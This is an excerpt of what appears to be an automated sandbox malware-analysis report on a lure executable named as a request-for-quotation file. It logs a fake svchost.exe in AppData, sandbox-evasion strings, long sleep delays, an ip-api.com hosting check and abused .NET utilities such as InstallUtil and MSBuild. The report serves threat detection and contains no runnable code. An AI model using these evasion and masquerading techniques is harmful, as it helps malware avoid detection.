                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | File opened: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 entries)
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Process information set: NOOPENFILEERRORBOX (31 identical entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (97 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX (64 identical entries)
                    Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (20 identical entries)
                    Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 entries, interleaved with the following)
                    Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (55 entries)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe PID: 7520, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7792, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7872, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7748, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: svchost.exe PID: 8396, type: MEMORYSTR
                    Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F69C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1993738956.000001A48033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1920918632.000002168033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.1950991965.0000028E8033C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000029.00000002.1983628252.0000024F0033C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Memory allocated: 2091DAF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Memory allocated: 20937660000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1A4FE310000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1A498000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 216F7350000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 216F8DA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 10A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2AC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 29F0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: D30000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: 2960000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: E90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 28EF0550000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 28EF1FA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 1090000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2BF0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2960000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 24F76540000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 24F77FA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Memory allocated: 10C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Memory allocated: 2C80000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Memory allocated: 4C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: 2A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: 4A60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: 12F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe Memory allocated: 2AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593856
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 587093
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599647
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599293
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599052
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593306
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593178
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599704
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599349
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 599078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 598774
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 594000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 593873
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599838
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599709
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599567
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599429
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599216
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 599023
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeThread delayed: delay time: 598717
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7243Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2352Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4749
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8219
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1119
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8102
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1604
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9108
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 6495
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindow / User API: threadDelayed 3120
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 6268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeWindow / User API: threadDelayed 3487
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep count: 41 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -37815825351104557s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7624Thread sleep count: 4952 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -599594s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -599453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595703s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595498s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595384s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7624Thread sleep count: 4749 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595281s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7560Thread sleep time: -595125s >= -30000s
